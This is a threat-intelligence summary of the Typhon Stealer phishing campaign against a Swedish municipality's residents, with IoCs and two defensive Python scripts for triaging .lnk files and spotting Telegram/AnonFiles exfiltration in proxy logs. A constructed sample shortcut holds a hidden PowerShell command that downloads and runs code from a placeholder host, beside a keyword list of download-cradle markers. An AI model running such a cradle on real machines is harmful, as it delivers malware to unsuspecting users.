Cyble researchers uncovered a phishing site impersonating Lindesbergs Kommun (a Swedish municipality) that delivers Typhon Stealer via a crafted .lnk file whose embedded PowerShell command downloads and runs the payload. The stealer harvests data from browsers, crypto wallets, gaming apps, FTP clients and messaging tools, exfiltrates it via Telegram or AnonFiles, and carries an unfinished module for dropping an XMRig cryptominer; the operator sells it through a Telegram channel. #TyphonStealer #PryntStealer #LindesbergsKommun #XMRig #AnonFiles #Telegram
Keypoints
- Typhon Stealer is distributed through a phishing page that mimics Lindesbergs Kommun and uses a .lnk file to trigger a PowerShell-driven download of the payload.
- The threat actor behind Typhon Stealer runs a Telegram channel and offers a lifetime subscription (about $50) and “spreading/crypting” services for others purchasing the stealer.
- Payload analysis indicates Typhon is built on Prynt Stealer, with a module for delivering an XMRig cryptominer that is incomplete in the analysed sample.
- Anti-analysis checks are built in (a mutex, GetModuleHandle lookups for sandbox/AV DLLs, and WMI queries that look for virtualization artifacts); if any check fires, the malware exits with a fake error message rather than running in the analysis environment.
- Typhon targets a wide range of data sources: browsers, crypto wallets, gaming apps (Steam, Uplay, Minecraft), FTP clients (FileZilla, WinSCP), messaging apps (Discord, Telegram, Pidgin), and system information.
- Stolen data is exfiltrated via Telegram and AnonFiles; separately, the phishing page itself posts the data a victim types into it to a Formspree endpoint.
- Beyond file and credential theft, the stealer implements clipboard clipping (replacing copied cryptocurrency wallet addresses) and keylogging, giving the operator credential access across the stores listed above.
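The delivery chain above (phishing page, .lnk file, PowerShell download-and-execute) is worth triaging offline: a shortcut's target and command line live in the StringData section of the MS-SHLLINK format and can be read without opening the file on Windows. The parser and heuristics below are an added example written for this page, not Cyble's tooling or the malware's code. The header layout and LinkFlags bits follow the published MS-SHLLINK specification; the cradle marker list and the two sample shortcuts (one PowerShell download cradle, one benign shortcut) are constructed here, not taken from the campaign.

```python
"""Parse a Windows .lnk (MS-SHLLINK) file and flag PowerShell download cradles."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# GUID 00021401-0000-0000-C000-000000000046 as stored on disk.
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Substrings in a shortcut's argument string that usually mean "fetch and run remote code".
# Heuristic list chosen for this example (assumption), not an exhaustive signature set.
CRADLE_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "invoke-expression", "iex(", "iex ",
    "net.webclient", "start-bitstransfer", "frombase64string", "-enc", "-w hidden", "-windowstyle hidden",
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file; raise ValueError if it is not a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != SHELL_LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:       # 2-byte size prefix, size excludes the prefix
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # 4-byte size prefix, size includes the prefix
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags}
    # StringData fields appear in this fixed order, each only if its flag is set.
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated StringData field {name}")
        pos += nbytes
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def cradle_indicators(fields: dict) -> list:
    """List the suspicious traits of a parsed shortcut; an empty list means nothing was flagged."""
    target = (fields.get("relative_path", "") + " " + fields.get("working_dir", "")).lower()
    args = fields.get("arguments", "").lower()
    hits = []
    if "powershell" in target or "pwsh" in target or args.lstrip().startswith(("powershell", "pwsh")):
        hits.append("target is PowerShell")
    hits += [f"argument marker: {m.strip()}" for m in CRADLE_MARKERS if m in args]
    if "http://" in args or "https://" in args:
        hits.append("remote URL in arguments")
    return hits


def build_lnk(relative_path: str, arguments: str, working_dir: str = "") -> bytes:
    """Build a minimal Unicode .lnk with only StringData (constructed input for this example)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS | (HAS_WORKING_DIR if working_dir else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, SHELL_LINK_CLSID, flags,
                         0x20,                 # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, 0, 0,        # timestamps, FileSize, IconIndex
                         7,                    # ShowCommand SW_SHOWMINNOACTIVE: window starts minimized
                         0, 0, 0, 0)           # HotKey, Reserved1-3
    def sd(s):  # CountCharacters (UTF-16 code units) followed by the UTF-16LE text
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + (sd(working_dir) if working_dir else b"") + sd(arguments)


# Constructed samples: a hidden PowerShell download cradle and an ordinary shortcut.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -ep bypass -c \"IEX((New-Object Net.WebClient).DownloadString('https://example.invalid/stage2'))\"",
    r"C:\Windows\System32",
)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "-multiInst notes.txt")


def triage(data: bytes) -> dict:
    fields = parse_lnk(data)
    return {"target": fields.get("relative_path"), "arguments": fields.get("arguments"),
            "indicators": cradle_indicators(fields)}


if __name__ == "__main__":
    for label, blob in (("suspicious", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage(blob))
```

Running `triage` over a real shortcut from a phishing kit is the quickest way to recover the download URL without detonating anything; note that the parser deliberately skips the LinkTargetIDList, so a shortcut that hides its target only in the ID list (no RelativePath) will show `target` as None and needs the ID list decoded separately.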
MITRE Techniques
- [T1566] Phishing – The lure is served via a phishing page hosting the TyphonStealer payload. Quote: “URL Hosting Phishing Page and TyphonStealer Payload”
- [T1204] User Execution – When a user opens a .lnk file, it executes PowerShell to download and run Typhon Stealer. Quote: “When a user opens a .lnk file, it further executes a PowerShell command, downloads Typhon stealer from the remote server, and executes it.”
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – If any anti-analysis check detects an AV product, sandbox or VM, the malware terminates with a fake error message. Quote: “The malware initially performs various Anti-Analysis checks … will terminate itself with a fake error message.”
- [T1555] Credentials from Password Stores – The stealer can steal data from multiple applications. Quote: “The stealer can steal data from multiple applications.”
- [T1539] Steal Web Session Cookie – Browser data harvesting includes session cookies; the technique is taken from the article’s ATT&CK mapping. Quote: “Steal Web Session Cookie”
- [T1552] Unsecured Credentials – Part of the stealer’s credential access capabilities. Quote: “Unsecured Credentials”
- [T1528] Steal Application Access Token – Part of the stealer’s credential access capabilities. Quote: “Steal Application Access Token”
- [T1113] Screen Capture – The stealer includes a screen capture capability. Quote: “Screen Capture”
- [T1087] Account Discovery – The malware conducts discovery related to user accounts on the system. Quote: “Account Discovery”
- [T1518] Software Discovery – It enumerates software (e.g., sandbox/AV DLLs) to detect analysis environments. Quote: “Software Discovery”
- [T1057] Process Discovery – It checks running processes to hinder analysis. Quote: “Process Discovery”
- [T1124] System Time Discovery – It uses system time in its checks. Quote: “System Time Discovery”
- [T1007] System Service Discovery – It identifies services on the host. Quote: “System Service Discovery”
- [T1567] Exfiltration Over Web Service – Stolen data is uploaded to Telegram and AnonFiles (the original listing gave the ID T1614, which is System Location Discovery; T1567 is the ID for the quoted technique). Quote: “Exfiltration Over Web Service”
- [T1095] Non-Application Layer Protocol – Listed in the article’s mapping. Note that the exfiltration channels it describes (Telegram, AnonFiles) are HTTPS web services, i.e. application-layer, so this mapping is not borne out by the described behaviour. Quote: “Non-Application Layer Protocol”
- [T1041] Exfiltration Over C2 Channel – Data exfiltration to Telegram/AnonFiles. Quote: “Exfiltration Over C&C Channel” / “Exfiltration Over Web Service”
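Exfiltration over Telegram and AnonFiles is a hunting opportunity because legitimate Telegram clients never call the Bot API (`https://api.telegram.org/bot<id>:<secret>/<method>`), and an endpoint POSTing to an anonymous file-drop service with no browser user-agent is rarely benign. The scanner below is an added example for this page, not Cyble's detection logic; the Bot API path shape is the published format, the AnonFiles `/upload` path is assumed to be the one the stealer used, and the proxy log lines (and their format) are constructed here. The Formspree URL rule uses the collection endpoint listed in the report's IoCs.

```python
"""Flag web-proxy log lines that look like stealer exfiltration via Telegram Bot API or AnonFiles."""
import re
from urllib.parse import urlsplit

# Telegram Bot API: /bot<numeric id>:<secret>/<method>. The secret is the attacker's exfil credential,
# so only the numeric bot id is echoed in the finding; the analyst still has the full URL.
BOT_API_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{20,})/(\w+)")
# Methods that push data out of the host rather than poll for commands.
UPLOAD_METHODS = {"senddocument", "sendmessage", "sendphoto", "sendvideo", "sendaudio"}
# Anonymous file-drop upload endpoints (assumption: the public API path, as AnonFiles documented it).
FILE_DROP_HOSTS = {"api.anonfiles.com": "/upload"}
# Known collection endpoint from the report's IoC list.
IOC_URLS = {"https://formspree.io/f/xknylake"}

# Constructed log format: time client method url "user-agent" bytes_out
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d+)$')

# Constructed sample lines (not from the article).
SAMPLE_LOG = """\
2022-08-16T09:12:01Z 10.0.4.21 GET https://intranet.example.invalid/ "Mozilla/5.0 (Windows NT 10.0) Firefox/103.0" 412
2022-08-16T09:12:44Z 10.0.4.21 POST https://formspree.io/f/xknylake "Mozilla/5.0 (Windows NT 10.0) Firefox/103.0" 318
2022-08-16T09:13:10Z 10.0.4.21 POST https://api.telegram.org/bot5012345678:AAHx9QzY2bC7dE3fG1hIjK4lMnO6pQrS8tU/sendDocument "" 2418733
2022-08-16T09:13:12Z 10.0.4.21 POST https://api.anonfiles.com/upload "" 5128901
2022-08-16T09:14:00Z 10.0.4.37 GET https://api.telegram.org/bot9988776655:BBGy8PzX1aB6cD2eF0gHiJ3kLmN5oPqR7sT/getUpdates "python-requests/2.28.1" 0
2022-08-16T09:15:30Z 10.0.4.52 GET https://web.telegram.org/k/ "Mozilla/5.0 (Windows NT 10.0) Chrome/104.0" 9021
"""


def classify(line: str):
    """Return a finding dict for a suspicious line, or None for lines that match no rule."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, ua, bytes_out = m.groups()
    parts = urlsplit(url)
    host, path = (parts.hostname or "").lower(), parts.path
    reasons = []
    if host == "api.telegram.org":
        bm = BOT_API_RE.match(path)
        if bm:
            bot_id, _secret, api_method = bm.groups()
            reasons.append(f"telegram bot api call ({api_method}) from endpoint, bot id {bot_id}")
            if api_method.lower() in UPLOAD_METHODS and method == "POST":
                reasons.append("bot api upload method")
    if host in FILE_DROP_HOSTS and path.startswith(FILE_DROP_HOSTS[host]) and method == "POST":
        reasons.append("upload to anonymous file-drop service")
    if url in IOC_URLS:
        reasons.append("known phishing-kit collection endpoint (report IoC)")
    if reasons and not ua:
        reasons.append("empty user-agent (non-browser client)")
    if not reasons:
        return None
    return {"time": ts, "client": client, "url": url, "bytes_out": int(bytes_out), "reasons": reasons}


def scan(log_text: str) -> list:
    """Run classify() over every line and keep the findings, in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["bytes_out"], "bytes ->", hit["url"].split("/")[2], hit["reasons"])
```

The `getUpdates` hit from 10.0.4.37 shows why the upload-method rule is separate: a bot polling for commands is suspicious on a workstation but is a different finding from a multi-megabyte `sendDocument` POST with no user-agent, which is the exfiltration event to triage first (pull the process from endpoint telemetry and check the bytes_out column against the size of the victim's browser profile).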
Indicators of Compromise
- [MD5] TyphonStealer Payload – a1f146eb008f077be809ab4e61f46f4e, 79dc4a4192469c3e697afd81409a52da, and 2 more hashes
- [SHA-1] TyphonStealer Payload – 8af9fc9aa7517ac327cc8692c2adf54537f39fe5, 51aa7b94b3f3921d21e730b113faa20e0f6b6902
- [SHA-256] TyphonStealer Payload – e04e65ddad749789f4f05bb88e2c8bde8df9263950eb120ad1191f217ca0c742, 48133d1aaf1a47f63ec73781f6a2b085b28174895b5865b8993487daec373e0a, and 1 more hash
- [URL] Lindesbergparkeringsanmarkning.netlify.app – URL Hosting Phishing Page and TyphonStealer Payload
- [URL] formspree.io/f/xknylake – Data submission endpoint used by the phishing page
Read more: https://blog.cyble.com/2022/08/16/phishing-site-used-to-spread-typhon-stealer/